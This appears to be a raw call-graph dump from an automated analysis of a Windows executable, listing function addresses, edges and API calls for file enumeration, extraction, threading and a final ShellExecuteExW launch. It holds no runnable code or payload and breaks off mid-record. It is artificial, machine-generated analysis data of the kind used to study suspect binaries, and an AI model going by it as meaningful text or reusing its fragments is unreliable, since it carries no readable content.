28695->28697 28696 295b82 28696->28692 28697->28696 28699 278180 28697->28699 28700 27818c __EH_prolog3 28699->28700 28701 284f2b 28 API calls 28700->28701 28702 278196 28701->28702 28702->28697 28703->28687 28705 27bc80 28704->28705 28745 2720b0 28705->28745 28707 27bca7 28708 27bcba 28707->28708 28969 27e910 28707->28969 28713 27bcec 28708->28713 28757 2727e0 28708->28757 28712 27bce8 28712->28713 28781 272d41 160 API calls __EH_prolog3_GS 28712->28781 28946 27232c 28713->28946 28718 27bd14 28719 27be08 28718->28719 28721 277673 28 API calls 28718->28721 28782 27bec2 7 API calls 28719->28782 28722 27bd36 28721->28722 28973 281e54 46 API calls 2 library calls 28722->28973 28724 27f711 53 API calls 28733 27bd53 28724->28733 28725 27be76 28725->28713 28786 2752d8 28725->28786 28798 27bf3d 28725->28798 28726 27be16 28726->28725 28783 28864f 28726->28783 28727 27bde8 28731 271a66 26 API calls 28727->28731 28730 271a66 26 API calls 28730->28733 28734 27bded 28731->28734 28733->28724 28733->28727 28733->28730 28974 281e54 46 API calls 2 library calls 28733->28974 28736 271a66 26 API calls 28734->28736 28736->28719 28738 281a9f 5 API calls 28737->28738 28739 27f723 28738->28739 28740 27f74b 28739->28740 29394 27f826 28739->29394 28740->28633 28743 27f738 FindClose 28743->28740 28744->28642 28746 2720bc __EH_prolog3 28745->28746 28747 2780ec 28 API calls 28746->28747 28748 2720d9 28747->28748 28749 282815 28 API calls 28748->28749 28750 2720e8 28749->28750 28751 2956f6 28 API calls 28750->28751 28755 272193 28750->28755 28752 272180 28751->28752 28754 2776e7 30 API calls 28752->28754 28752->28755 28754->28755 28975 28026f 28755->28975 28756 272227 _abort 28756->28707 28758 2727ec __EH_prolog3 28757->28758 28759 2711dd 28 API calls 28758->28759 28763 272838 28758->28763 28777 27298b 28758->28777 28764 272882 28759->28764 28760 2729a9 28986 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28760->28986 28762 2752d8 133 API calls 28767 2729f4 28762->28767 28763->28760 28765 2729b6 28763->28765 28779 27e850 111 API calls 28764->28779 28765->28762 28765->28777 28766 272a3c 28770 272a6f 28766->28770 28766->28777 28987 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28766->28987 28767->28766 28769 2752d8 133 API calls 28767->28769 28769->28767 28770->28777 28780 27e850 111 API calls 28770->28780 28771 272986 28773 272e8b 26 API calls 28771->28773 28772 272995 28774 272e8b 26 API calls 28772->28774 28773->28777 28774->28763 28775 2728ad 28775->28771 28775->28772 28776 2752d8 133 API calls 28778 272ac0 28776->28778 28777->28712 28778->28776 28778->28777 28779->28775 28780->28778 28781->28718 28782->28726 28988 294300 28783->28988 28787 2752e4 28786->28787 28788 2752e8 28786->28788 28787->28725 28797 27e850 111 API calls 28788->28797 28789 2752fa 28790 275315 28789->28790 28791 275323 28789->28791 28796 275355 28790->28796 29018 2748aa 118 API calls 2 library calls 28790->29018 29019 273d9d 131 API calls 3 library calls 28791->29019 28793 275321 28793->28796 29020 27344b 89 API calls 28793->29020 28796->28725 28797->28789 28799 27bf95 28798->28799 28804 27bfc4 28799->28804 28863 27c2fd 28799->28863 29120 28cdb4 135 API calls __EH_prolog3_GS 28799->29120 28800 27d2e5 28802 27d331 28800->28802 28803 27d2ea 28800->28803 28802->28863 29192 28cdb4 135 API calls __EH_prolog3_GS 28802->29192 28803->28863 29191 27ab88 185 API calls 28803->29191 28804->28800 28808 27bfeb 28804->28808 28804->28863 28805 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28806 27d327 28805->28806 28806->28725 28808->28863 29021 277e1b 28808->29021 28811 27c0c8 29033 28106b 28811->29033 28815 27c151 28819 27c16f 28815->28819 29122 282095 45 API calls __EH_prolog3_GS 28815->29122 28817 27c269 28824 27c29b 28817->28824 29123 2719a9 26 API calls 28817->29123 28818 27d205 28820 27c948 28818->28820 28858 27c743 28818->28858 28845 27c239 28819->28845 29125 280ddb 28 API calls 28819->29125 28835 27c97a 28820->28835 29158 2719a9 26 API calls 28820->29158 28822 27c374 28822->28818 28825 27c3cf 28822->28825 28826 27c3ea 28822->28826 28824->28863 29124 2719a9 26 API calls 28824->29124 28827 271a66 26 API calls 28825->28827 28838 27c409 28826->28838 29127 27b92d 56 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28826->29127 28832 27c3da 28827->28832 28837 271a66 26 API calls 28832->28837 28834 27d276 28834->28863 29190 2719a9 26 API calls 28834->29190 28835->28863 29159 2719a9 26 API calls 28835->29159 28837->28863 28840 27c4ea 28838->28840 28841 27f711 53 API calls 28838->28841 28839 27c33d _wcslen 29126 27f103 52 API calls 2 library calls 28839->29126 29043 27b2ee 28840->29043 28852 27c49b 28841->28852 28845->28817 28845->28822 28846 27c5c2 28847 27c7d8 28846->28847 28851 27c5cf 28846->28851 29136 282a36 115 API calls 28847->29136 28848 271a66 26 API calls 28848->28840 28887 27c62c 28851->28887 29130 2757c0 28 API calls 2 library calls 28851->29130 28852->28848 28855 27c501 28862 27c551 28855->28862 29128 2719a9 26 API calls 28855->29128 28856 27c8f0 28865 27c9eb 28856->28865 28882 27c8ff 28856->28882 28857 27c830 28857->28856 28866 27c859 28857->28866 28858->28834 29189 2719a9 26 API calls 28858->29189 28862->28863 29129 2719a9 26 API calls 28862->29129 28863->28805 28878 27c874 28865->28878 29049 27b345 28865->29049 28871 27ed0d 49 API calls 28866->28871 28873 27ca64 28866->28873 28866->28878 28867 27c940 28869 27ddc7 114 API calls 28867->28869 28869->28820 28870 27d1f2 28874 27ddc7 114 API calls 28870->28874 28875 27c8b3 28871->28875 28872 27ca01 28876 27ca05 28872->28876 29055 27b778 28872->29055 28873->28870 28898 27cac5 28873->28898 29160 27e152 28873->29160 28874->28818 28875->28878 29138 27d8b8 28875->29138 28879 27ddc7 114 API calls 28876->28879 28878->28873 28878->28876 28883 27b345 90 API calls 28878->28883 28879->28858 28882->28867 29157 27b544 144 API calls __EH_prolog3_GS 28882->29157 28890 27ca5e 28883->28890 28886 27cb15 28892 27fd70 28 API calls 28886->28892 28887->28858 28888 27c77a 28887->28888 28894 27c781 28887->28894 29131 27b015 28 API calls 28887->29131 29132 282a36 115 API calls 28887->29132 29133 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28887->29133 29134 27b8ed 89 API calls 28887->29134 29135 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28888->29135 28890->28873 28890->28876 28912 27cb2f 28892->28912 28894->28857 29137 27ede9 119 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28894->29137 28896 27cab7 29164 279653 109 API calls 28896->29164 29085 27fd70 28898->29085 28899 27cc21 28900 27cf27 28899->28900 28901 27cc76 28899->28901 28903 27cf50 28900->28903 28904 27cf39 28900->28904 28927 27ccb5 28900->28927 28902 27cd33 28901->28902 28906 27cc94 28901->28906 29168 2822b9 28 API calls 28902->29168 29089 289625 28903->29089 29175 27d771 28904->29175 28910 27ccd8 28906->28910 28919 27cca3 28906->28919 28909 27cd69 28913 28106b 45 API calls 28909->28913 28910->28927 29167 27a7a2 142 API calls 28910->29167 28911 27cf73 29107 2894ea 28911->29107 28912->28899 29165 27e39d 8 API calls 28912->29165 28917 27cd76 28913->28917 29169 27b92d 56 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28917->29169 29166 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28919->29166 28922 27cdaf 28923 27cddd 28922->28923 28924 27cddf 28922->28924 28925 27cdcd 28922->28925 28930 27ce3e 28923->28930 29172 2719a9 26 API calls 28923->29172 29171 27d3d7 135 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28924->29171 29170 27a496 119 API calls 28925->29170 28932 27cf15 28927->28932 29174 27fd28 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28927->29174 28930->28927 29173 2719a9 26 API calls 28930->29173 28935 27d044 28932->28935 29186 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28932->29186 28934 27d115 29115 27e772 28934->29115 28935->28870 28935->28934 28938 27d161 28935->28938 29114 27e8d9 SetEndOfFile 28935->29114 28938->28870 28940 27f58b 49 API calls 28938->28940 28939 27d159 28941 27de50 110 API calls 28939->28941 28942 27d1d2 28940->28942 28941->28938 28942->28870 29187 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 28942->29187 28944 27d1e8 29188 279500 109 API calls __EH_prolog3_GS 28944->29188 28947 27233e 28946->28947 28951 272350 28946->28951 28947->28951 29390 2723b0 26 API calls 28947->29390 28948 271a66 26 API calls 28950 272369 28948->28950 29391 272ed0 26 API calls 28950->29391 28951->28948 28953 272374 29392 2724d9 26 API calls 28953->29392 28970 27e927 28969->28970 28971 27e931 28970->28971 29393 2793d7 110 API calls __EH_prolog3_GS 28970->29393 28971->28708 28973->28733 28974->28733 28976 28028f _abort 28975->28976 28983 280152 28976->28983 28979 271a66 26 API calls 28980 2802b4 28979->28980 28981 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 28980->28981 28982 2802bf 28981->28982 28982->28756 28984 2725a4 26 API calls 28983->28984 28985 2801c7 28984->28985 28985->28979 28986->28777 28987->28770 28989 29430c __EH_prolog3_GS 28988->28989 29004 282117 28989->29004 28992 284318 53 API calls 28993 294342 28992->28993 28994 286a25 53 API calls 28993->28994 28995 29434c 28994->28995 28996 271a66 26 API calls 28995->28996 28997 29435b 28996->28997 29008 293ec5 28997->29008 29000 271a66 26 API calls 29001 294375 29000->29001 29002 295787 5 API calls 29001->29002 29003 288665 29002->29003 29003->28725 29005 282124 29004->29005 29006 27769f 45 API calls 29005->29006 29007 282136 29006->29007 29007->28992 29009 293ed1 __EH_prolog3_GS 29008->29009 29010 2714a7 28 API calls 29009->29010 29011 293edd 29010->29011 29012 293572 21 API calls 29011->29012 29013 293eec 29012->29013 29014 271a66 26 API calls 29013->29014 29015 293ef4 29014->29015 29016 295787 5 API calls 29015->29016 29017 293ef9 29016->29017 29017->29000 29018->28793 29019->28793 29020->28796 29023 277e27 __EH_prolog3_GS 29021->29023 29193 277bfc 29023->29193 29024 277e6c 29025 295787 5 API calls 29024->29025 29026 277ecf 29025->29026 29026->28811 29027 277e68 29027->29024 29030 277ed2 29027->29030 29032 277ebe 29027->29032 29198 277bd6 30 API calls 29027->29198 29029 271a66 26 API calls 29029->29024 29030->29032 29199 27adaa CompareStringW 29030->29199 29032->29029 29042 281095 29033->29042 29034 281256 29036 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29034->29036 29035 27769f 45 API calls 29037 281241 29035->29037 29038 27c11b 29036->29038 29039 2725a4 26 API calls 29037->29039 29038->28819 29121 282095 45 API calls __EH_prolog3_GS 29038->29121 29040 28124d 29039->29040 29041 271a66 26 API calls 29040->29041 29041->29034 29042->29034 29042->29035 29044 27b303 29043->29044 29045 27b33b 29044->29045 29237 279635 89 API calls 29044->29237 29045->28846 29045->28855 29047 27b333 29238 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29047->29238 29050 27b368 29049->29050 29052 27b39e 29049->29052 29050->29052 29239 2885fd 75 API calls 29050->29239 29052->28872 29053 27b39a 29053->29052 29240 2732a1 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29053->29240 29056 27b784 __EH_prolog3_GS 29055->29056 29057 27b8e3 29056->29057 29059 27d8b8 138 API calls 29056->29059 29058 295787 5 API calls 29057->29058 29060 27b8ea 29058->29060 29061 27b7ef 29059->29061 29060->28878 29061->29057 29241 279283 109 API calls 29061->29241 29063 27b817 29064 27ed0d 49 API calls 29063->29064 29065 27b81d 29064->29065 29066 27b838 29065->29066 29242 27ed1f 29065->29242 29255 281a27 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29066->29255 29069 27b83e 29069->29057 29256 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29069->29256 29071 27b850 29073 277673 28 API calls 29071->29073 29072 27b827 29072->29066 29254 2732a1 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29072->29254 29076 27b859 29073->29076 29075 27b88d 29077 27eaf3 54 API calls 29075->29077 29083 27b8c9 29075->29083 29076->29075 29257 27ede9 119 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29076->29257 29079 27b8a1 29077->29079 29080 27d8b8 138 API calls 29079->29080 29082 27b8c5 29080->29082 29081 271a66 26 API calls 29081->29057 29082->29083 29258 279283 109 API calls 29082->29258 29083->29081 29086 27fd7e 29085->29086 29088 27fd88 29085->29088 29087 2956f6 28 API calls 29086->29087 29087->29088 29088->28886 29090 289639 29089->29090 29091 28975f 29090->29091 29095 289644 29090->29095 29093 29734a _com_raise_error RaiseException 29091->29093 29092 289739 29092->28911 29099 28970b 29093->29099 29094 2896ed 29094->29092 29098 28971f 29094->29098 29094->29099 29095->29092 29095->29094 29096 29d08c ___std_exception_copy 21 API calls 29095->29096 29095->29099 29096->29094 29097 29734a _com_raise_error RaiseException 29102 2897a3 __EH_prolog3 _abort 29097->29102 29098->29092 29260 289556 89 API calls 4 library calls 29098->29260 29099->29097 29101 289896 29101->28911 29102->29101 29103 295b4b 28 API calls 29102->29103 29105 28982d _abort 29102->29105 29103->29105 29104 29d08c ___std_exception_copy 21 API calls 29104->29105 29105->29101 29105->29104 29261 279384 89 API calls 29105->29261 29108 2894f3 29107->29108 29109 28951f 29108->29109 29110 289515 29108->29110 29113 28951d 29108->29113 29277 28abc8 155 API calls 29109->29277 29262 28b76f 29110->29262 29113->28927 29114->28934 29116 27e783 29115->29116 29118 27e792 29115->29118 29117 27e789 FlushFileBuffers 29116->29117 29116->29118 29117->29118 29119 27e80f SetFileTime 29118->29119 29119->28939 29120->28804 29121->28815 29122->28819 29123->28824 29124->28863 29125->28839 29126->28845 29127->28838 29128->28862 29129->28863 29130->28887 29131->28887 29132->28887 29133->28887 29134->28887 29135->28894 29136->28894 29137->28857 29139 27d8c5 29138->29139 29140 27ed0d 49 API calls 29139->29140 29149 27d8d7 29140->29149 29141 27d93e 29142 27d953 29141->29142 29146 27de9a 49 API calls 29141->29146 29145 27eaf3 54 API calls 29142->29145 29152 27d957 29142->29152 29143 27d8e8 29143->29149 29358 27d990 125 API calls __EH_prolog3_GS 29143->29358 29148 27d973 29145->29148 29146->29142 29150 27d977 29148->29150 29151 27d982 29148->29151 29149->29141 29149->29143 29149->29152 29154 27ed0d 49 API calls 29149->29154 29359 28846c 61 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29149->29359 29360 2792e6 RaiseException _com_raise_error 29149->29360 29153 27de9a 49 API calls 29150->29153 29155 27ec63 49 API calls 29151->29155 29152->28878 29153->29152 29154->29149 29155->29152 29157->28867 29158->28835 29159->28863 29161 27e15b GetFileType 29160->29161 29162 27caa5 29160->29162 29161->29162 29162->28898 29163 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29162->29163 29163->28896 29164->28898 29165->28899 29166->28927 29167->28927 29168->28909 29169->28922 29170->28923 29171->28923 29172->28930 29173->28927 29174->28932 29176 27d77d __EH_prolog3 29175->29176 29177 2711dd 28 API calls 29176->29177 29178 27d788 29177->29178 29179 282af9 150 API calls 29178->29179 29185 27d7b1 29179->29185 29180 27d804 29182 27d828 29180->29182 29369 2719a9 26 API calls 29180->29369 29182->28927 29184 282af9 150 API calls 29184->29185 29185->29180 29185->29184 29361 282ce5 29185->29361 29186->28935 29187->28944 29188->28870 29189->28834 29190->28863 29191->28863 29192->28863 29200 27790e 29193->29200 29195 277c1d 29195->29027 29197 27790e 47 API calls 29197->29195 29198->29027 29199->29032 29201 28106b 45 API calls 29200->29201 29221 277989 _wcslen 29201->29221 29202 277b1b 29206 277b4a 29202->29206 29227 2719a9 26 API calls 29202->29227 29203 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29205 277bbb 29203->29205 29205->29195 29205->29197 29208 277b92 29206->29208 29228 2719a9 26 API calls 29206->29228 29208->29203 29209 277673 28 API calls 29209->29221 29210 282117 45 API calls 29210->29221 29211 28106b 45 API calls 29211->29221 29213 27769f 45 API calls 29213->29221 29214 271a66 26 API calls 29214->29221 29216 277bc2 29217 271a66 26 API calls 29216->29217 29218 277bc7 29217->29218 29219 271a66 26 API calls 29218->29219 29219->29202 29220 271b63 28 API calls 29220->29221 29221->29202 29221->29209 29221->29210 29221->29211 29221->29213 29221->29214 29221->29216 29221->29220 29222 281a9f 29221->29222 29226 277bd6 30 API calls 29221->29226 29223 281ab1 29222->29223 29229 2796e5 29223->29229 29226->29221 29227->29206 29228->29208 29230 2796f1 _wcslen 29229->29230 29233 2790f4 29230->29233 29236 279137 _abort 29233->29236 29234 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29235 2791a9 29234->29235 29235->29221 29236->29234 29237->29047 29238->29045 29239->29053 29240->29052 29241->29063 29243 27ed2b __EH_prolog3_GS 29242->29243 29244 27ed38 GetFileAttributesW 29243->29244 29245 27ed46 29244->29245 29252 27edad 29244->29252 29247 28169a 47 API calls 29245->29247 29246 295787 5 API calls 29248 27edc3 29246->29248 29249 27ed68 29247->29249 29248->29072 29250 27ed81 29249->29250 29251 27ed78 GetFileAttributesW 29249->29251 29250->29252 29259 2719a9 26 API calls 29250->29259 29251->29250 29252->29246 29254->29066 29255->29069 29256->29071 29257->29075 29258->29083 29259->29252 29260->29092 29261->29105 29278 2897a4 29262->29278 29265 28bb9c 29310 28a814 129 API calls __InternalCxxFrameHandler 29265->29310 29267 28bbb5 __InternalCxxFrameHandler 29268 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29267->29268 29269 28bbfc 29268->29269 29269->29113 29274 28b78e __InternalCxxFrameHandler 29274->29265 29285 282af9 29274->29285 29296 287590 29274->29296 29302 28a008 150 API calls 29274->29302 29303 28bc05 150 API calls 29274->29303 29304 2877cf 29274->29304 29308 289a2b 129 API calls 29274->29308 29309 28c27f 155 API calls 29274->29309 29277->29113 29280 2897b0 __EH_prolog3 _abort 29278->29280 29279 289896 29279->29274 29280->29279 29281 295b4b 28 API calls 29280->29281 29283 28982d _abort 29280->29283 29281->29283 29282 29d08c ___std_exception_copy 21 API calls 29282->29283 29283->29279 29283->29282 29311 279384 89 API calls 29283->29311 29293 282b0f __InternalCxxFrameHandler 29285->29293 29286 282c7f 29287 282cb3 29286->29287 29312 282ab0 29286->29312 29288 282cd4 29287->29288 29318 2782a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 29287->29318 29319 2873f8 29288->29319 29293->29286 29294 282c76 29293->29294 29316 27fe6f 123 API calls __EH_prolog3 29293->29316 29317 28cdb4 135 API calls __EH_prolog3_GS 29293->29317 29294->29274 29297 28759c 29296->29297 29299 2875a1 29296->29299 29335 287628 29297->29335 29300 2875b1 29299->29300 29301 2877cf 113 API calls 29299->29301 29300->29274 29301->29300 29302->29274 29303->29274 29305 2877db ResetEvent ReleaseSemaphore 29304->29305 29306 287806 29304->29306 29350 2875ed WaitForSingleObject 29305->29350 29306->29274 29308->29274 29309->29274 29310->29267 29311->29283 29313 282ab8 29312->29313 29314 282af5 29312->29314 29313->29314 29325 288618 29313->29325 29314->29287 29316->29293 29317->29293 29318->29288 29320 2873ff 29319->29320 29321 28741a 29320->29321 29333 2792e6 RaiseException _com_raise_error 29320->29333 29323 28742b SetThreadExecutionState 29321->29323 29334 2792e6 RaiseException _com_raise_error 29321->29334 29323->29294 29328 294231 29325->29328 29329 2860d5 29328->29329 29330 294248 SendDlgItemMessageW 29329->29330 29331 290678 PeekMessageW GetMessageW IsDialogMessageW TranslateMessage DispatchMessageW 29330->29331 29332 288638 29331->29332 29332->29314 29333->29321 29334->29323 29336 287633 29335->29336 29340 2876a1 29335->29340 29337 287638 CreateThread 29336->29337 29338 287690 SetThreadPriority 29336->29338 29336->29340 29343 2792eb 109 API calls __EH_prolog3_GS 29336->29343 29344 279500 109 API calls __EH_prolog3_GS 29336->29344 29345 2792e6 RaiseException _com_raise_error 29336->29345 29337->29336 29346 287760 29337->29346 29338->29336 29340->29299 29343->29336 29344->29336 29345->29336 29349 28776e 116 API calls 29346->29349 29348 287769 29349->29348 29351 2875fe GetLastError 29350->29351 29352 287624 29350->29352 29356 2792eb 109 API calls __EH_prolog3_GS 29351->29356 29352->29306 29354 287618 29357 2792e6 RaiseException _com_raise_error 29354->29357 29356->29354 29357->29352 29358->29143 29359->29149 29360->29149 29362 282d18 29361->29362 29363 282cfe __InternalCxxFrameHandler 29361->29363 29362->29363 29370 27e948 29362->29370 29365 282d42 29363->29365 29387 27fe6f 123 API calls __EH_prolog3 29363->29387 29367 2873f8 2 API calls 29365->29367 29368 282d47 29367->29368 29368->29185 29369->29182 29371 27e954 __EH_prolog3_GS 29370->29371 29372 27e963 29371->29372 29373 27e976 GetStdHandle 29371->29373 29386 27e988 29371->29386 29374 295787 5 API calls 29372->29374 29373->29386 29376 27eaab 29374->29376 29375 27e9df WriteFile 29375->29386 29376->29363 29377 27e9af WriteFile 29378 27e9ad 29377->29378 29377->29386 29378->29377 29378->29386 29380 27ea77 29381 2714a7 28 API calls 29380->29381 29382 27ea84 29381->29382 29389 279653 109 API calls 29382->29389 29384 27ea97 29385 271a66 26 API calls 29384->29385 29385->29372 29386->29372 29386->29375 29386->29377 29386->29378 29386->29380 29388 279230 111 API calls 29386->29388 29387->29365 29388->29386 29389->29384 29391->28953 29393->28971 29395 27f835 __EH_prolog3_GS 29394->29395 29396 27f847 FindFirstFileW 29395->29396 29397 27f925 FindNextFileW 29395->29397 29400 27f948 29396->29400 29401 27f86a 29396->29401 29399 27f937 GetLastError 29397->29399 29397->29400 29403 27f90d 29399->29403 29406 2714a7 28 API calls 29400->29406 29402 28169a 47 API calls 29401->29402 29404 27f88c 29402->29404 29405 295787 5 API calls 29403->29405 29408 27f8ac 29404->29408 29411 27f89c FindFirstFileW 29404->29411 29412 27f899 29404->29412 29409 27f733 29405->29409 29407 27f95f 29406->29407 29419 28229d 29407->29419 29413 27f8e8 29408->29413 29418 2719a9 26 API calls 29408->29418 29409->28740 29409->28743 29411->29408 29412->29411 29413->29400 29415 27f902 GetLastError 29413->29415 29415->29403 29416 271a66 26 API calls 29416->29403 29418->29413 29420 2822a6 29419->29420 29423 28236c 29420->29423 29424 282378 29423->29424 29427 28238e 29424->29427 29426 27f970 29426->29416 29428 2824e5 29427->29428 29432 2823a4 29427->29432 29435 2758cb 45 API calls 29428->29435 29430 2823bc 29430->29426 29432->29430 29434 280c7f 28 API calls 29432->29434 29434->29430 29439 27d70b 29436->29439 29441 27d6e5 29436->29441 29438 27ec63 49 API calls 29438->29441 29472 27d89e 29439->29472 29441->29438 29441->29439 29442 27b231 26 API calls 29443 27d74c 29442->29443 29444 271a66 26 API calls 29443->29444 29445 27d755 29444->29445 29446 271a66 26 API calls 29445->29446 29447 27d75e 29446->29447 29448 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29447->29448 29449 27b1bf 29448->29449 29449->28647 29456 28909b 29449->29456 29451 2828bb 29450->29451 29477 27fb8e 29451->29477 29453 2828ed 29454 27fb8e 118 API calls 29453->29454 29455 2828f8 29454->29455 29457 2890aa 29456->29457 29458 2874ec 118 API calls 29457->29458 29459 2890b9 29457->29459 29458->29459 29488 284264 26 API calls 29459->29488 29461 2890e8 29489 284264 26 API calls 29461->29489 29463 2890f3 29490 284264 26 API calls 29463->29490 29465 2890fe 29491 284288 26 API calls 29465->29491 29467 289132 29468 272e8b 26 API calls 29467->29468 29469 28913a 29468->29469 29470 272e8b 26 API calls 29469->29470 29471 289142 29470->29471 29473 27d714 29472->29473 29474 27d8a8 29472->29474 29473->29442 29476 27ae77 26 API calls 29474->29476 29476->29473 29478 27fbbb 29477->29478 29480 27fbc2 29477->29480 29481 2874ec 29478->29481 29480->29453 29482 2877cf 113 API calls 29481->29482 29483 287518 ReleaseSemaphore 29482->29483 29484 287538 29483->29484 29485 287556 DeleteCriticalSection CloseHandle CloseHandle 29483->29485 29486 2875ed 111 API calls 29484->29486 29485->29480 29487 287542 CloseHandle 29486->29487 29487->29484 29487->29485 29488->29461 29489->29463 29490->29465 29491->29467 29501 28eac4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29492->29501 29494 28eaad 29495 28eab9 29494->29495 29502 28eae5 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 29494->29502 29495->28307 29495->28308 29497->28309 29498->28318 29499->28318 29500->28321 29501->29494 29502->29495 29503->28324 29504->28327 29505->28340 29507 27e910 110 API calls 29506->29507 29508 272dc7 29507->29508 29509 2727e0 133 API calls 29508->29509 29512 272de4 29508->29512 29510 272dd4 29509->29510 29510->29512 29517 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29510->29517 29512->28350 29512->28351 29514 27279b 29513->29514 29516 272797 29513->29516 29518 2726d2 29514->29518 29516->28356 29517->29512 29519 2726e4 29518->29519 29521 272721 29518->29521 29520 2752d8 133 API calls 29519->29520 29524 272704 29520->29524 29526 275767 29521->29526 29524->29516 29529 275770 29526->29529 29527 2752d8 133 API calls 29527->29529 29528 272742 29528->29524 29531 272c30 29528->29531 29529->29527 29529->29528 29530 2873f8 2 API calls 29529->29530 29530->29529 29532 272c3c __EH_prolog3_GS 29531->29532 29553 275365 29532->29553 29534 272c8f 29541 272d02 29534->29541 29589 2719a9 26 API calls 29534->29589 29535 295787 5 API calls 29538 272d18 29535->29538 29536 272c5a 29536->29534 29539 272c86 29536->29539 29540 272c91 29536->29540 29538->29524 29585 28888c 28 API calls 29539->29585 29543 272c9a 29540->29543 29544 272cb9 29540->29544 29541->29535 29586 28880e 28 API calls __EH_prolog3 29543->29586 29587 288707 29 API calls 2 library calls 29544->29587 29546 272ca7 29547 2725a4 26 API calls 29546->29547 29549 272caf 29547->29549 29551 271a66 26 API calls 29549->29551 29550 272cd2 29588 272ed0 26 API calls 29550->29588 29551->29534 29554 275380 29553->29554 29555 2753ae 29554->29555 29556 2753ca 29554->29556 29590 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29555->29590 29557 275634 29556->29557 29561 2753f6 29556->29561 29596 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29557->29596 29560 2753b9 29562 295734 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 29560->29562 29561->29560 29564 289625 89 API calls 29561->29564 29563 275659 29562->29563 29563->29536 29570 275449 29564->29570 29565 27547b 29566 27550d 29565->29566 29584 275472 29565->29584 29593 282a36 115 API calls 29565->29593 29568 27fd70 28 API calls 29566->29568 29567 275477 29567->29565 29592 27315d 28 API calls 29567->29592 29574 275520 29568->29574 29569 275467 29591 27204b 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29569->29591 29570->29565 29570->29567 29570->29569 29571 28909b 118 API calls 29571->29560 29576 2755b9 29574->29576 29577 2755a9 29574->29577 29579 2894ea 155 API calls 29576->29579 29578 27d771 155 API calls 29577->29578 29580 2755b7 29578->29580 29579->29580 29594 27fd28 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29580->29594 29582 2755f1 29582->29584 29595 2732d2 89 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 29582->29595 29584->29571 29585->29534 29586->29546 29587->29550 29588->29534 29589->29541 29590->29560 29591->29584 29592->29565 29593->29566 29594->29582 29595->29584 29596->29560 29598 277493 29597->29598 29601 277441 29597->29601 29607 271a92 28 API calls 29598->29607 29605 27744c 29601->29605 29606 2712d3 28 API calls Concurrency::cancel_current_task 29601->29606 29603 277471 29604 2711b8 28 API calls 29603->29604 29604->29605 29605->28385 29606->29603 29608 292813 29609 277673 28 API calls 29608->29609 29617 292832 _wcslen 29609->29617 29610 292af7 29672 2758cb 45 API calls 29610->29672 29611 292a9a 29611->29610 29612 277673 28 API calls 29611->29612 29613 292aec 29612->29613 29630 2938a0 29613->29630 29617->29610 29617->29611 29618 27120c 28 API calls 29617->29618 29619 2928fe 29618->29619 29668 28645a 28 API calls 29619->29668 29621 292a01 29624 292a39 29621->29624 29670 2719a9 26 API calls 29621->29670 29624->29611 29671 2719a9 26 API calls 29624->29671 29625 27adaa CompareStringW 29628 29292f 29625->29628 29626 271a66 26 API calls 29626->29628 29627 2714a7 28 API calls 29627->29628 29628->29621 29628->29625 29628->29626 29628->29627 29669 28645a 28 API calls 29628->29669 29637 2938ac __EH_prolog3_GS _abort 29630->29637 29631 293ba8 29632 271a66 26 API calls 29631->29632 29633 293bcf 29632->29633 29634 295787 5 API calls 29633->29634 29635 293bd4 29634->29635 29635->29610 29636 293a1e 29639 2714a7 28 API calls 29636->29639 29637->29631 29637->29636 29679 288da4 CompareStringW 29637->29679 29640 293a34 29639->29640 29641 27ed0d 49 API calls 29640->29641 29642 293a41 29641->29642 29643 271a66 26 API calls 29642->29643 29644 293a4b 29643->29644 29645 293a9d ShellExecuteExW 29644->29645 29646 2714a7 28 API calls 29644->29646 29648 293ab2 29645->29648 29652 293b7c 29645->29652 29647 293a71 29646->29647 29680 280e49 51 API calls 2 library calls 29647->29680 29649 293ace IsWindowVisible 29648->29649 29650 293ae5 WaitForInputIdle 29648->29650 29657 293b30 CloseHandle 29648->29657 29649->29650 29653 